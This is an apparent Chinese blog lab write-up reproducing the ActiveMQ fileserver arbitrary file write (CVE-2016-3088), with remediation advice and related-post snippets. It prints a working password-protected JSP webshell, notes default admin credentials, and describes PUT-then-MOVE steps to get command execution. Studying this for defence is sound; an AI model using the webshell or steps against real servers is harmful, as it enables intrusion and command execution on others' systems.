ActiveMQ任意文件写入漏洞分析溯源

最新推荐文章于 2024-12-23 05:30:00 发布
原创 最新推荐文章于 2024-12-23 05:30:00 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ActiveMQ #任意文件上传

本文深入分析了ActiveMQ中的任意文件写入漏洞,包括其背景、复现过程及利用方式,展示了如何通过fileserver应用实现文件写入,并提供了有效的解决方案。

文章目录

墨者学院

WEB安全

ActiveMQ任意文件写入漏洞分析溯源

ActiveMQ 简介

ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java
的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0
及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用

fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

  1. 其使用率并不高
  2. 文件操作容易出现漏洞
漏洞复现

  1. 访问url

    [外链图片转存失败(img-1HKCRMhE-1567593936607)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567586846125.png)]

  2. 查找漏洞

    搜索发现存在CVE-2016-3088 漏洞,找到分析查看漏洞原因

    查询发现在ActiveMQ<5.12.x版本存在fileserver 应用,可以通过fileserver写入文件(不解析jsp文件)通过移动到任意位置,就可以造成任意文件写入漏洞。

    文件写入的几种利用方式

    1 写入webshell

    2 写入 cron 或 ssh key

    3 写入 jar 或 jetty.xml 等库和配置文件

    写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh
    key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。

  3. 漏洞利用

    尝试写入jsp

    有回显带密码验证的
<% 
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
请求url:http://ip:port/Shell/cmd2.jsp?pwd=023&i=ls

    通过burp访问,发现需要验证,需要登录,我们尝试登录,默认的ActiveMQ的账号和密码均为admin

    [外链图片转存失败(img-41qx81dr-1567593936610)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567588127893.png)]

    登录后查看http方法 ,发现没有put方法

    [外链图片转存失败(img-Aj1yZ2mY-1567593936612)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567588291964.png)]

    执行put方法 发现却上传成功了

    [外链图片转存失败(img-tAfJ6kfK-1567593936614)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567591713323.png)]

    接下来通过move移动到admin或api下,就可以解析jsp文件了, 查找他的绝对路径

    访问url:http://ip:port/admin/test/systemProperties.jsp

    在这里插入图片描述

    通过move方法将jsp木马移动到admin或api下,进行解析

    在这里插入图片描述

    然后访问,可以执行命令,

    [外链图片转存失败(img-WBjI6m66-1567593936620)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567591882796.png)]

    这里就可以直接查看flag,但是找了半天没找到,最后在根目录找到了flag

    [外链图片转存失败(img-MXybFIcb-1567593936621)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567592783859.png)]

解决方案
  1. ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。
  2. 通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能
参考链接

jsp一句话

ActiveMQ任意文件写入漏洞

漏洞复现】---- ActiveMQ任意文件写入漏洞(CVE-2016-3088)
qq_43168364的博客
09-05 879
一、简介 ActiveMQ的web控制台分为三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是存储文件接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计的目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现: (1) 其使用率并不高 (2) 文件操作容易出
Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
WY92139010的博客
08-07 565
Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现 一、漏洞描述 该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过M...
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
swordheart的博客
01-18 1135
漏洞简介 ActiveMQ web控制台分为三个应用,admin、api和fileserver,其中admin为管理员页面,api为接口,fileserver为存放文件的接口;admin和api需要登录才可以使用,fileserver不需要登录。 fileserver 是一个 RESTful API 接口。我们可以通过GET、PUT、DELETE等HTTP请求来读写其中存储的文件。设计目的是为了弥补消息队列操作无法传输和存储二进制文件的缺陷,但后来发现: 它的使用率不高 文件操作容易出现漏洞 所以
任意文件写入漏洞
最新发布
若有战,召必回
12-23 1264
这里就完成了写入,可以看到通过id获取fvsTemplateStyle,然后获取这个fvsTemplateStyle中attachID对应的byte,然后在resource判断有没有有这个attachid,肯定是没有的,继续从fvsTemplateStyle中获取metadata,然后从metadata中获取name的值,若果为空就用attachID + ".png"拼接,这里从metadata取到了,不为空。这就有意思了,image是一个byte流可控,name我们可控,没过滤,也就是可以通过"…
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
ddr12231的博客
07-30 438
上传webshell 容器用vulhub的 PUT一个jsp文件 MOVE到api目录 默认的ActiveMQ账号密码均为admin,首先访问http://your-ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径: 访问 其它利用方法--转 写入crontab,自动化弹shell 这是一个比较稳健的方法。首先上传...
墨者21道
帅醉了的博客
08-28 1040
1.1.1.uWSGI 漏洞复现(CVE-2018-7490) 测试详情 查找CVE-2018-7490漏洞,此漏洞构造…%2f可以访问任意文件,目录遍历,在key.txt前面多添加/…%2f…%2f…%2f…%2就可以得到key 1.1.2.Webmin未经身份验证的远程代码执行 测试详情 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 受影响的版本:Webmin<=1.920 抓包 修改包 第一步,修改
企业应急响应和溯源排查之道.pdf
06-22
8. ActiveMQ安全漏洞ActiveMQ存在多个安全漏洞,例如反序列化命令执行、fileserver任意文件写入漏洞等,需要对ActiveMQ进行安全检查和加固。 9. 应用系统安全漏洞排查工具:应用系统安全漏洞排查需要使用相应的...
网络安全专业名词解释
热门推荐
qq_40909772的博客
03-04 1万+
Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互,作名词解.
架构师必备10大接口性能优化秘技,条条经典!
lc547913923的专栏
11-19 1149
在测试案例对比中,时间耗时的顺序为 Pzstd < ISA-L < Pigz < LZ 4 < Zstd < Brotli < Gzip (排名越靠前越好),其中压缩和解压缩的时间在整体的耗时上占比较大,因此备选策略为 Pzstd、ISA-L、Pigz。详细的测试过程和方案对比可以参考原文:《速度与压缩比如何兼得?压缩算法在构建部署中的优化》9.3 小结。
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
m0_74402888的博客
05-02 2540
漏洞出现在 fileserver 应用中,漏洞原理是 fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞写入文件方法写入 webshell写入 cron 或 ssh key 等文件写入 jar 或 jetty.xml 等库和配置文件。
Aria2 任意文件写入漏洞
shierbai的博客
05-24 553
因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如 http://binux.github.io/yaaw/demo/。6800是aria2的rpc服务的默认端口,环境启动后,访问`http://your-ip:6800/`,发现服务已启动并且返回404或空白页面。打开yaaw,点击配置setting按钮,填入运行aria2的目标域名:`http://your-ip:6800/jsonrpc`注意此处只是为了真实环境区别,我这里靶机和攻撃机是同一台。
ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
2201_76115387的博客
08-06 738
ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
写入txt 换行_Vulhub漏洞系列:ActiveMQ任意文件写入漏洞分析
weixin_30488835的博客
01-06 181
一、ActiveMQ简介:Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。二、漏洞描述:本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我...
Tomcat 任意写入文件漏洞(CVE-2017-12615)
weixin_62512865的博客
11-22 609
刷新页面,使用burp进行抓取数据包,将其发送到repeater中,改请求类型为 PUT 类型,并给上传的文件进行重命名操作(这里命名为 1.jsp,上传的文件为一句话木马无回显执行系统命令)首先进入该漏洞的文件目录下,并使用docker启动靶场环境。访问靶场:192.168.187.135:8080。使用冰蝎去尝试连接,连接成功。查看靶场的端口开放情况。
ActiveMQ任意文件写入漏洞 CVE-2016-3088 漏洞复现
ADummy的博客
02-20 293
ActiveMQ任意文件写入漏洞 by ADummy 0x00利用路线 ​ Burpsuite构造包上传webshell—>Burpsuite构造包移动文件—>访问webshell—>代码执行 0x01漏洞介绍 ​ 本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。 ​ ActiveMQ
Tomcat 通过 PUT 方法任意写入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1639
CVE-2017-12615 对应的漏洞任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件 。Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件
写入文件_漏洞复现:ActiveMQ任意文件写入漏洞(CVE20163088)
weixin_42107561的博客
01-12 563
文章说明漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习。源码下载连接在文章最后。漏洞说明该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是...
Apache ActiveMQ未授权访问漏洞分析
根据给定文件信息,以下是针对“activemq未授权访问漏洞环境”进行详细知识点解析: ### 知识点一:ActiveMQ简介 Apache ActiveMQ是一款开源消息中间件,它是Apache软件基金会下的一个项目。ActiveMQ支持多种语言...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值